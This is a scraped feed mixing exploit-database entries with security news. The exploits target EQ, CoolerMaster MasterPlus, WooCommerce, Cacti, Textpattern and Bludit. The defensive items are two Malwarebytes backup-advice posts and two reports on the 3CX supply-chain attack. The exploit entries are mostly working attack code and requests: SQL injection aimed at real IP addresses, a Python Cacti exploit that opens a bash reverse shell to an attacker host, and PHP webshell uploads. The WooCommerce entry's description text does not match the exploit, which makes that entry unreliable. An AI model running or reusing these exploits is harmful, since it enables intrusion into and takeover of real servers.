EQ Enterprise Management System version 2.2.0 suffers from a remote SQL injection vulnerability.

    Exploit Title: EQ Enterprise management system v2.2.0 - SQL InjectionDate: 2022.12.7Exploit Author: TLFVendor Homepage: https://www.yiquantech.com/pc/about.htmlSoftware Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/Version: EQ v1.5.31 to v2.2.0Tested on: windows 10CVE : CVE-2022-45297 POC:POST /Account/Login HTTP/1.1 Host: 121.8.146.131 User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 118 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg Origin: http://121.8.146.131Referer: http://121.8.146.131/Account/Login X-Requested-With: XMLHttpRequest Accept-Encoding: gzipRememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27

EQ Enterprise Management System 2.2.0 SQL Injection

CoolerMaster MasterPlus version 1.8.5 suffers from an unquoted service path vulnerability.

    # Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path# Date: 11/17/2022# Exploit Author: Damian Semon Jr (Blue Team Alpha)# Version: 1.8.5# Vendor Homepage: https://masterplus.coolermaster.com/# Software Link: https://masterplus.coolermaster.com/# Tested on: Windows 10 64x# Step to discover the unquoted service path:wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """CoolerMaster MasterPlus Technology Service  MPService  C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe  Auto# Info on the service:C:\>sc qc MPService[SC] QueryServiceConfig SUCCESSSERVICE_NAME: MPService        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : CoolerMaster MasterPlus Technology Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem                        #Exploit:A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger. Ex: (C:\Program.exe)

CoolerMaster MasterPlus 1.8.5 Unquoted Service Path

WordPress WooCommerce plugin version 7.1.0 suffers from a remote code execution vulnerability.

    # Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)# Date: 2022-12-07# Author: Milad Karimi# Vendor Homepage: https://wordpress.org/plugins/woocommerce# Software Link: https://wordpress.org/plugins/woocommerce# Tested on: windows 10 , firefox# Version: 7.1.0# CVE : N/A# Description:simple, easy to use jQuery frontend to php backend that pings variousdevices and changes colors from green to red depending on if device isup or down.# PoC :http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.phphttp://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php# Vulnerabile code: 95: $classname $classname($post_id);   94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');     92: ⇓ function save($post_id, $post)       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));           92: ⇓ function save($post_id, $post)

WordPress WooCommerce 7.1.0 Remote Code Execution

Cacti version 1.2.22 suffers from a remote command execution vulnerability.

    # Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)# Exploit Author: Riadh BOUCHAHOUA# Discovery Date: 2022-12-08 # Vendor Homepage: https://www.cacti.net/# Software Links : https://github.com/Cacti/cacti# Tested Version: 1.2.2x <= 1.2.22# CVE: CVE-2022-46169# Tested on OS: Debian 10/11#!/usr/bin/env python3import randomimport httpx, urllibclass Exploit:    def __init__(self, url, proxy=None, rs_host="",rs_port=""):        self.url = url         self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)        self.rs_host = rs_host        self.rs_port = rs_port    def exploit(self):        # cacti local ip from the url for the X-Forwarded-For header        local_cacti_ip  = self.url.split("//")[1].split("/")[0]            headers = {            'X-Forwarded-For': f'{local_cacti_ip}'        }                revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"        import base64        b64_revshell = base64.b64encode(revshell.encode()).decode()        payload = f";echo {b64_revshell} | base64 -d | bash -"        payload = urllib.parse.quote(payload)        urls = []                # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)        for host_id in range(1,100):            for local_data_ids in range(1,100):                urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")                        for url in urls:            r = self.session.get(url,headers=headers)            print(f"{r.status_code} - {r.text}" )        pass    def random_user_agent(self):        ua_list = [            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",        ]        return random.choice(ua_list)def parse_args():    import argparse        argparser = argparse.ArgumentParser()    argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")    argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)    argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)    return argparser.parse_args()def main() -> None:    # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL     args = parse_args()    e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)    e.exploit()if __name__ == "__main__":    main()

Cacti 1.2.22 Remote Command Execution

Textpattern version 4.8.8 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://textpattern.com/# Version : 4.8.8# Tested on: windows 11 xammp | Kali linux# Category: WebApp# Google Dork: intext:"Published with Textpattern CMS"# Date: 10/09/2022######### Description ##########  Step 1: Login admin account and go settings of site#  Step 2: Upload a file to web site and selecet the rce.php#  Step3 : Upload your webshell that's it...######### Proof of Concept ########========>>> START REQUEST <<<=========############# POST REQUEST (FILE UPLOAD) ############################## (1)POST /textpattern/index.php?event=file HTTP/1.1Host: localhostContent-Length: 1038sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJuX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/textpattern/index.php?event=fileAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0adminConnection: close------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="fileInputOrder"1/1------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="app_mode"async------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="MAX_FILE_SIZE"2000000------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="event"file------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="step"file_insert------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="id"------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="_txp_token"16ea3b64ca6379aee9599586dae73a5d------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="thefile[]"; filename="rce.php"Content-Type: application/octet-stream<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>------WebKitFormBoundaryMgUEFltFdqBVvdJu--############ POST RESPONSE (FILE UPLOAD) ######### (1)HTTP/1.1 200 OKDate: Sat, 10 Sep 2022 15:28:57 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6X-Powered-By: PHP/8.1.6X-Textpattern-Runtime: 35.38 msX-Textpattern-Querytime: 9.55 msX-Textpattern-Queries: 16X-Textpattern-Memory: 2893 kBContent-Length: 270Connection: closeContent-Type: text/javascript; charset=utf-8___________________________________________________________________________________________________________________________________________________############ REQUEST TO THE PAYLOAD ############################### (2)GET /files/c.php?cmd=whoami HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: txp_login_public=4353608be0adminConnection: close############ RESPONSE THE PAYLOAD ############################### (2)HTTP/1.1 200 OKDate: Sat, 10 Sep 2022 15:33:06 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6X-Powered-By: PHP/8.1.6Content-Length: 29Connection: closeContent-Type: text/html; charset=UTF-8<pre>alpernae\alperen</pre>========>>> END REQUEST <<<=========

Textpattern 4.8.8 Remote Code Execution

Categories: News
Categories: Ransomware
Tags: World Backup Day

Backups are your last line of defense against ransomware, if they work.



(Read more...)




The post 3 tips for creating backups your organization can rely on when ransomware strikes appeared first on Malwarebytes Labs.

Backups are an organization's last line of defense against ransomware, because comprehensive, offline, offsite backups give you a chance to restore or rebuild your computers without paying a criminal for a decryption key.

Unfortunately, many organizations don't realize how important it is to make backups until it's too late. And it's all-too-common for those that do take regular backups to discover too late that they aren't fit for purpose.

Why? Because backups are hard to get right.

In September 2021, Malwarebytes spoke with Matt Crape from VMWare to find out why backups are so hard, why they fail, and what to do about it. This World Backup Day, we thought we'd revisit his advice for creating a more consistent, stable, and resilient backup process. Here are three essential things every organization can ponder today.

**1\. Know what you're trying to achieve**

Good backups start with a clear understanding of what your organization needs them to do. From that, you can determine what needs to be backed up, why, how frequently, and for how long. The answers to those questions will depend on how much data you have, how often it changes, whether you can live without any of it, whether you have remote employees, the implications of legal requirements such as GDPR, and a wide range of other factors.

Every organization is different, so the "right" answers to those questions will be unique for each. Organizations also change over time so decisions about what you need from your backups need to be reviewed often enough to keep up.

When thinking about ransomware, a good starting point is to imagine what you would need to do if all of your computers were rendered useless and you had to rebuild them from scratch. What's your approach, will you restore everything from backups, or recreate applications and operating systems from a "golden" disk image? If that's your plan, do you know how long it will take to reinstate every computer in your organization? Can your business survive that much downtime?

**2\. Keep a backup offline and offsite**

Modern ransomware attacks are carried out by gangs who break into company networks, prepare the ground for their attack, and then run their ransomware manually. Gangs can spend weeks inside a network looking to increase the chances of their attack succeeding, and backups are a prime target. If the attackers can find them, they will delete them.

That's exactly what happened when a ransomware gang attacked the Northshore School District in Washington state. In an instructive and painfully honest episode of our Lock and Code podcast, Systems administrator Ski Kacoroski told us “we find out, at about 4 or 5 hours after the attack, that our backup system is completely gone.” Without effective backups, Kacoroski was left with a mountain to climb: “It started to really sink in that I’m going to have to rebuild 180 Windows servers, and more importantly, rebuild Active Directory from scratch, with all those accounts and groups, and everything in it. That part really, really hurt us.”

The lesson of the Northshore attack and many others is that it's vital to keep at least one recent copy of your data offsite and offline, beyond the reach of an attacker who has domain administrator access to your network

CISA recommends the tried and tested 3-2-1 rule of backups: 3 copies of your data, on 2 different media, with 1 held offsite, which provides resilience against a range of different risks, including ransomware.

**3\. Test your backups**

A backup is only as useful as the data that can be successfully restored from it. So while it's useful to know that your backup solution is running and recording data, the only way to be sure it works is to try reading data from it.

A true acid test is to prove to yourself that in the event of a ransomware attack, natural disaster, fire or flood, that you can restore your critical business systems from scratch. Simply having the data may not be enough. Companies grow organically and unless they are very new, their networks are likely to have been built over time rather than in one go. This can create interdependencies where system A requires system B and system B requires system A, and so on.

And keep in mind that the best judge of whether data has been restored successfully is the person who relies on that data—so keep them engaged during the testing.

**Learn more**

To learn more about why backups fail when you need them, and how to improve your chances of success, listen to the full podcast with Matt Crape, embedded below.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

3 tips for creating backups your organization can rely on when ransomware strikes

Categories: Personal
Because backups are the dental floss of cybersecurity—the thing that everyone knows they should do, that everyone intends to do, that nobody actually does.



(Read more...)




The post 3 tips to raise your backup game appeared first on Malwarebytes Labs.

Happy World Backup Day everyone!

What, you didn't know it was World Backup Day? Hmmm, perhaps that's not a surprise. If there was an award for "most overlooked really important thing in computing", backups would win. Every year.

So let's put that right this year and spend a minute or two of World Backup Day thinking about backups. Backups are great! Having backups is like having a do-over for your mistakes, and who hasn't wished for that? And they can keep you safe too. Good computer security means creating layers of protection that overlap and cover each others' backs. The final layer is your backups. They're a "get out of jail free" card you can play if any of your files are destroyed, deleted, or corrupted by malware.

To get you off on the right foot we've got three tips: A beginner tip, an intermediate tip, and an advanced tip.

**1\. Make backups**

Yes, our first tip really is "make backups". Why? Because backups are the dental floss of cybersecurity—the thing that everyone knows they should do, that everyone _intends_ to do, that nobody actually does.

You need to floss your computer, every day. We don't care how you do it: You can use the cloud, put your files on a USB stick, plug in an external hard drive, burn your data to a disk (ask your parents), copy them to an FTP site (ask your grandparents), or print them out and bind them in a book for all we care. All we ask is that you make a copy of your data, and then make making copies of your data a habit.

The only backup you'll ever regret is the one you didn't make.

**2\. Make them automatic**

Once you decide that you're going to make regular copies of your data you are, in all likelihood, going to get bored of doing it and slip up on your rigorous, well-intentioned schedule. Humans just aren't good at doing the same thing, the same way, every day. But you know what is? A computer.

So, our intermediate tip is to let the computer take the strain of remembering what you want to backup and when. They love that stuff.

Windows and macOS both come with backup software included, each of which is perfectly on-brand for your platform of choice. The Windows backup solution has a boring and sensible name. It's called Backup and Restore. On Mac you'll be using a Time Machine, because Apple lets its marketing department in the room when things are being named. As you'd expect, if you're a Linux user there are a bewildering number of options to choose from. If you're blinded by overchoice, check out Amanda.

**3\. Make sure they work**

If you've followed tip two and automated your backups then you can sit back and relax right? Sure, you can. But if you want to know _for sure_ that your backup solution will be there for when you need it most, you need to test it. After all, a backup is only as useful as the data you can actually restore from it.

Anyone who works with computers knows that assumption is the mother of all f\*\*\* ups, so don't assume your backups work, prove they do. Pick a file you really care about and go get a copy of it from your backups. Better yet, if you have a directory where you keep lots of important files, restore that. Not only will that prove to you that your backups can dig you out of trouble if they ever need to, you'll get a feel for how slow that process can be if you're backing up over Wi-Fi. Understanding that restoring a lot of files from a backup can be a lengthy process will help you set your expectations and manage your stress levels if you ever need to.

**Pat yourself on the back**

Whether you made it all the way to rolling out tip three, or you stopped at one, we applaud you. Your digital life is now more resilient than it was, which means you'll be better able to weather hardware failures, accidental deletions, and malware outbreaks. 

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

3 tips to raise your backup game

Bludit version 3-14-1 suffers from a remote shell upload vulnerability.

    # Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.bludit.com/# Version : 3-14-1# Tested on: windows 11 wampserver | Kali linux# Category: WebApp# Google Dork: intext:'2022 Powered by Bludit'# Date: 8.12.2022######## Description ##########  Step 1 : Archive as a zip your webshell (example: payload.zip)#  Step 2 : Login admin account and download 'UploadPlugin'#  Step 3 : Go to UploadPlugin section#  Step 4 : Upload your zip#  Step 5 : target/bl-plugins/[your_payload]######### Proof of Concept ########==============> START REQUEST <========================================POST /admin/plugin/uploadplugin HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264Content-Length: 1820Origin: https://036e-88-235-222-210.eu.ngrok.ioDnt: 1Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadpluginUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="tokenCSRF"b6487f985b68f2ac2c2d79b4428dda44696d6231-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="pluginorthemes"plugins-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="zip_file"; filename="a.zip"Content-Type: application/zipPK    †eˆU               a/PK   ”fˆUÆ  ª)¢  Ä      a/a.phpíVÛŽÓ0}ç+La BÛìVÜ–pX®ËJ @Vêº­!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/.&nbsp;pÝãZ+M5/•¶BÎÈ0>©M†[jÅ‚ÓB,„õtOÌ¤Òœ.×4;’†e)¨ƒ¼È×”¯9[Z¡dðÆ  „Œ&Âd<ó`÷+œN—’y¼ÁRLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“j±u\õ„±†à/ï¾ÎÞž´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þÇ¸0yÕU¥H"ÕÕÿI  IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç  Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ïe8©ô*Ô¾"ý¡@Ó2+ëÂ`÷kC57j©'Î"m ã®ho¹ xŸô Û;’œcçzÙQË·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ  ØIÏ²òÖ`Ð:%F½$A"t;buOMr4Ýè~–eãÎ™åØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~tÂ6á¾,…ÅèçO´ÇÆ×Î£v²±ãÿbÃ‘Ú’‘Ug[;pq›eÓÜÅØÿéJË}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK?    †eˆU             $       €íA    a/          þš®,Ù þš®,Ù€ø¨j.ÙPK?   ”fˆUÆ  ª)¢  Ä    $        €¤    a/a.php          ¤eÝ-Ù ÷C-Ù bj.ÙPK      ­   ç    -----------------------------308003478615795926433430552264Content-Disposition: form-data; name="submit"Upload-----------------------------308003478615795926433430552264--==============> END REQUEST <========================================## WEB SHELL UPLOADED!==============> START RESPONSE <========================================HTTP/2 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:01:43 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTNgrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4Pragma: no-cacheServer: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: Bludit....==============> END RESPONSE <========================================# REQUEST THE WEB SHELL==============> START REQUEST <========================================GET /bl-plugins/a/a.php?cmd=whoami HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailers==============> END REQUEST <======================================================> START RESPONSE <========================================HTTP/2 200 OKContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:13:14 GMTNgrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919Server: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: PHP/7.4.26Content-Length: 32<pre>nt authority\system</pre>==============> END RESPONSE <========================================

Bludit 3-14-1 Shell Upload

Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack.
The version numbers include 18.12.407 and 18.12.416 for Windows and 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 for macOS.
The company said it's engaging the services of Google-owned Mandiant to review the incident. In the

Cyber Threat / Supply Chain Attack

Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack.

The version numbers include **18.12.407 and 18.12.416** for Windows and **18.11.1213, 18.12.402, 18.12.407, and 18.12.416** for macOS.

The company said it's engaging the services of Google-owned Mandiant to review the incident. In the interim, it's urging its customers of self-hosted and on-premise versions of the software to update to version 18.12.422.

"3CX Hosted and StartUP users do not need to update their servers as we will be updating them over the night automatically," 3CX CEO Nick Galea said in a post on Thursday. "Servers will be restarted and the new Electron App MSI/DMG will be installed on the server."

Evidence available so far points to either a compromise of 3CX's software build pipeline to distribute Windows and macOS versions of the app package, or alternatively, the poisoning of an upstream dependency. The scale of the attack is currently unknown.

The earliest period of potentially malicious activity is said to have been detected on or around March 22, 2023, according to a post on the 3CX forum, although preparations for the campaign are said to have commenced no later than February 2022.

3CX said the initial alert flagging a potential security problem in its app last week was treated as a "false positive" owing to the fact that none of the antivirus engines on VirusTotal labeled it as suspicious or malware.

The Windows version of the attack leveraged a technique called DLL side-loading to load a rogue library referred to as "ffmpeg.dll" that's designed to read encrypted shellcode from another DLL called "d3dcompiler\_47.dll."

This involved accessing a GitHub repository to retrieve an ICO file containing URLs hosting the final-stage payload, an information stealer (dubbed ICONIC Stealer or SUDDENICON) capable of harvesting system information and sensitive data stored in web browsers.

"The choice of these two DLLs – ffmpeg and d3dcompiler\_47 – by the threat actors behind this attack was no accident," ReversingLabs security researcher Karlo Zanki said.

"The target in question, 3CXDesktopApp, is built on the Electron open source framework. Both of the libraries in question usually ship with the Electron runtime and, therefore, are unlikely to raise suspicion within customer environments."

SUDDENICON downloading a new executable

The macOS attack chain, in the same vein, bypassed Apple's notarization checks to download an unknown payload from a command-and-control (C2) server that's currently unresponsive.

"The macOS version does not use GitHub to retrieve its C2 server," Volexity said, which is tracking the activity under the cluster UTA0040. "Instead, a list of C2 servers is stored in the file encoded with a single byte XOR key, 0x7A."

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

Cybersecurity firm CrowdStrike, in an advisory of its own, has attributed the attack with high confidence to Labyrinth Chollima (aka Nickel Academy), a North Korea-aligned state-sponsored actor.

"The activity, which targets many organizations across a broad range of verticals without any obvious patterns, has been attributed to Labyrinth Chollima based on observed network infrastructure uniquely associated with that adversary, similar installation techniques, and a reused RC4 key," Adam Meyers, senior vice president of intelligence at CrowdStrike, told The Hacker News.

"The trojanized 3CX applications invoke a variant of ArcfeedLoader, malware uniquely attributed to Labyrinth Chollima."

Labyrinth Chollima, per the Texas-based company, is a subset of the Lazarus Group, which also constitutes Silent Chollima (aka Andariel or Nickel Hyatt) and Stardust Chollima (aka BlueNoroff or Nickel Gladstone).

The group "has been active at least since 2009 and typically tries to generate revenue by targeting crypto and financial organizations," Meyers said, adding it's "likely affiliated with Bureau 121 of the DPRK's Reconnaissance General Bureau (RGB) and primarily conducts espionage operations and revenue generation schemes."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

3CX Supply Chain Attack — Here's What We Know So Far

Cisco Talos is tracking and actively responding to a supply chain attack involving the 3CX Desktop Softphone application.
This is a multi-stage attack that involves sideloading DLLs, seven-day sleep routines, and additional payloads dependent on a now-removed GitHub repository for Windows based systems.
MacOS systems used a different infection chain

Thursday, March 30, 2023 18:03

*   Cisco Talos is tracking and actively responding to a supply chain attack involving the 3CX Desktop Softphone application.
*   This is a multi-stage attack that involves sideloading DLLs, seven-day sleep routines, and additional payloads dependent on a now-removed GitHub repository for Windows based systems.
*   MacOS systems used a different infection chain leveraging a hardcoded C2 domain, as opposed to the GitHub repo.
*   This is just the latest supply chain attack threatening users, after the SolarWinds incident in 2020 and the REvil ransomware group exploiting Kaseya VSA in 2021.

**Summary**

Cisco Talos recently became aware of a supply chain attack affecting Windows and MacOS users of the 3CX software-based phone application. This attack leveraged the legitimate update functionality of the 3CX application to deliver a set of malicious payloads to 3CX users.

The infection chain consists of several stages and involves sideloading DLLs along with a seven-day sleep cycle before the malware attempts to retrieve additional malicious artifacts from a now-removed GitHub repository for the Windows based infection. The GitHub repository hosted a series of icon files with encrypted data appended to the end of the files. These encrypted strings, once decrypted, contained the C2 domains for additional malicious artifacts.

The MacOS version used a hard coded C2 domain. These second-stage payloads are information stealers that attempt to obtain system information and the latest browsing history records, indicating this information may be used as a filtering mechanism to identify and discard some victims while maintaining unauthorized access to others.

During our investigation we were able to see file activity dating back to February 3, 2023. However, the GitHub repository has been active since December 2022. The full scope of the attack is uncertain at this point. The 3CX website claims to have over 600,000 customers and 12 million daily users. It's unclear how many are users of the 3CX Desktop App versus the web app option that was not affected. 3CX is currently asking users to use the web app while they work to release an update.

**Preparing since February 2022**

Based on Cisco Talos investigation, it appears the infrastructure that supported this attack was being prepared as early as February 2022 when the domains were first registered. A second cluster of activity happened toward the end of 2022 when the GitHub repository was created, along with a few other domains. The sbmsa\[.\]wiki domain was also created on Feb. 9, 2023, which was found to be used by the second stage of the MacOS version.  

The timeline below illustrates these clusters of activity.

Timeline of domain registration activity.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Talos created the following coverage for this:

Snort SIDs:

Snort 3: 300480,300481

Snort 2: 61550-61553

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, Cisco Secure Endpoint customers need to make sure that "%3CX%" is entered into the program field under the "Installed Program Search" for Windows and ".\*3CX.\*" under "Installed Applications Monitoring" for MacOS in Orbital.

Additionally, the users can access the OSQueries directly on GitHub for both Windows and MacOS.

**Indicators of Compromise (IOCs)**

Indicators of compromise (IOCs) associated with ongoing activity can be found here.

Tag

#windows